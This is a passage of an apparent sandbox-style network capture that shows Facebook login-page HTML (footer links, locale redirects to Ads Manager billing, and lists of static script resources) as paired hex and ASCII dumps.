2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46
                                                                                                                                                                                    Data Ascii: ata-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2F
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16146INData Raw: 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22
                                                                                                                                                                                    Data Ascii: .com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16148INData Raw: 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 65 73 5f 4c 41 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35
                                                                                                                                                                                    Data Ascii: eLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16149INData Raw: 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 68 69 5f 49 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32
                                                                                                                                                                                    Data Ascii: illing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16150INData Raw: 6c 65 3d 22 53 69 67 6e 20 55 70 20 66 6f 72 20 46 61 63 65 62 6f 6f 6b 22 3e 53 69 67 6e 20 55 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c
                                                                                                                                                                                    Data Ascii: le="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook L
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16152INData Raw: 62 6f 6f 6b 20 53 65 72 76 69 63 65 73 20 64 69 72 65 63 74 6f 72 79 2e 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 76 6f 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d
                                                                                                                                                                                    Data Ascii: book Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title=
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16153INData Raw: 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e
                                                                                                                                                                                    Data Ascii: ><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Con
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16155INData Raw: 22 68 61 73 68 22 3a 22 41 54 36 38 6f 66 70 63 53 70 37 43 41 7a 4d 64 51 68 6b 22 7d 2c 22 31 32 39 31 30 32 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 31 39 4c 73 65 49 47 31 6e 77 71 33 6f 6a 7a 41 22 7d 2c 22 31 33 39 39 32 31 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 67 75 43 57 31 65 79 49 6b 4f 56 31 45 5f 42 30 22 7d 2c 22 31 34 30 31 30 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 5f 75 6f 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 30 5a 4d 22 7d 2c 22 31 37
                                                                                                                                                                                    Data Ascii: "hash":"AT68ofpcSp7CAzMdQhk"},"1291023":{"result":false,"hash":"AT519LseIG1nwq3ojzA"},"1399218":{"result":true,"hash":"AT6guCW1eyIkOV1E_B0"},"1401060":{"result":true,"hash":"AT5aetN5Gb3reIXV_uo"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBU0ZM"},"17
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16156INData Raw: 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 70 49 30 59 6b 78 33 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 65 5c 2f 72 5c 2f 36 7a 6d 68 6d 62 6c 6c 70 57 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 37 5c 2f 6a 6c 43 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 50 74 6d 66 78 4c 56 77 41 62 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b
                                                                                                                                                                                    Data Ascii: p8lg5Kz","nc":1},"pI0Ykx3":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/6zmhmbllpWw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"M7\/jlCR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/PtmfxLVwAb7.js?_nc_x=Ij3Wp8lg5K
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16158INData Raw: 53 5c 2f 4c 48 55 78 41 34 6f 36 4a 32 35 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 47 65 62 33 7a 49 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 38 4a 46 34 5c 2f 79 36 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4d 6e 42 39 33 66 31 5f 31 31 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c
                                                                                                                                                                                    Data Ascii: S\/LHUxA4o6J25.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dGeb3zI":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8JF4\/y6\/l\/en_US\/MnB93f1_11N.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16159INData Raw: 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6c 32 67 55 79 5f 6f 72 78 66 37 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 56 73 32 34 4e 41 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 41 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 74 43 6f 36 37 4a 6e 6f 68 34 73 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 4b 38 67 5c 2f 69 54 22 3a 7b 22 74 79 70
                                                                                                                                                                                    Data Ascii: https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/l\/0,cross\/l2gUy_orxf7.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"PVs24NA":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/l\/0,cross\/tCo67Jnoh4s.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"OK8g\/iT":{"typ
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16161INData Raw: 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4e 5c 2f 72 5c 2f 34 64 71 6a 4b 4a 52 4c 6f 4a 30 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 6c 38 2b 31 50 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 49 5c 2f 72 5c 2f 75 47 75 65 39 76 73 30 47 7a 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 7a 36 31 41 33 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70
                                                                                                                                                                                    Data Ascii: src.php\/v3\/yN\/r\/4dqjKJRLoJ0.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"il8+1P2":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yI\/r\/uGue9vs0GzT.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ez61A3Q":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16162INData Raw: 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 39 30 50 34 5c 2f 79 41 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6d 4f 2d 54 69 31 38 5a 69 42 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 58 4a 55 6b 52 78 38 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 74 5c 2f 72 5c 2f 5f 39 5f 6b 67 4b 78 6d 44 73 4a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 5a 6e 78 5a 56 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74
                                                                                                                                                                                    Data Ascii: /static.xx.fbcdn.net\/rsrc.php\/v3i90P4\/yA\/l\/en_US\/mO-Ti18ZiBA.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"XJUkRx8":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/_9_kgKxmDsJ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ZnxZVAc":{"type":"css","src":"htt
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16164INData Raw: 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 75 70 37 70 4a 41 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6f 35 45 34 5c 2f 79 42 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 30 6d 4a 44 4f 57 49 43 6a 6a 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 2b 57 65 7a 75 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 33 69 34 5c 2f 79 5a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 36 55 56
                                                                                                                                                                                    Data Ascii: =Ij3Wp8lg5Kz","nc":1},"tup7pJA":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3io5E4\/yB\/l\/en_US\/0mJDOWICjj6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"++WezuR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iL3i4\/yZ\/l\/en_US\/6UV
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16165INData Raw: 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6a 7a 51 34 5c 2f 79 77 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 33 45 34 71 35 73 55 64 6d 32 66 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 72 35 38 44 58 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4a 32 73 4c 75 71 33 52 43 58 30 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 63 42
                                                                                                                                                                                    Data Ascii: ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ijzQ4\/yw\/l\/en_US\/3E4q5sUdm2f.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"tr58DXl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/J2sLuq3RCX0.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"cB
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16167INData Raw: 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 75 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 45 58 4c 42 73 69 30 37 5a 32 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 50 42 58 4b 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6c 71 6f 4f 75 54 6e 66 4e 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 34 57 75 33 4b 42 51 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e
                                                                                                                                                                                    Data Ascii: src.php\/v3iLl54\/yu\/l\/en_US\/EXLBsi07Z2u.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jjPBXKl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/JlqoOuTnfNk.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"4Wu3KBQ":{"type":"css","src":"https:\/\/static.xx.fbcdn.
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16168INData Raw: 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 74 56 73 68 70 31 4f 49 56 39 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 67 5f 5f 65 56 35 4f 58 53 58 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 45 34 44 6f 66 54
                                                                                                                                                                                    Data Ascii: x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/tVshp1OIV9l.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/g__eV5OXSXl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"oE4DofT
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16170INData Raw: 22 53 67 44 30 47 31 71 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 69 71 61 4e 64 37 76 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 31 34 37 76 78 35 41 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 4f 4d
                                                                                                                                                                                    Data Ascii: "SgD0G1q","dvxITuo","iqaNd7v"],"rds":{"m":["BanzaiScuba_DEPRECATED"],"r":["uZnYnjA"]},"be":1},"AsyncRequest":{"r":["fBNyzd4","+CEjbBy","SgD0G1q","ORfF6wp","147vx5A","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["uZnYnjA"]},"be":1},"DOM
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16171INData Raw: 6a 73 6b 46 6a 75 45 22 2c 22 5a 6f 59 53 2b 4c 69 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 41 69 6a 39 5a 39 22 2c 22 34 6e 43 72 37 59 46 22 2c 22 46 4a 76 47 4b 5c 2f 6a 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 53 67 44 30 47 31 71 22 2c 22 55 46 62 4b 58 4a 4d 22 2c 22 76 70 74 55 4a 79 38 22 2c 22 33 6d 63 36 79 62 76 22 2c 22 50 75 64 36 42 32 5a 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 6d 36 50 63 6c 49 51 22 2c 22 69 6c 38 2b 31 50 32 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 67 63 44 34 4e 63 52 22 2c 22 45 7a 36 31 41 33 51 22 2c 22 53 5a 37 44 71 43 42 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 6d 4f 32 52 55 6f 47 22 2c 22 61 6d 6c 4b 4f 78 6b 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 4d 37 5c 2f
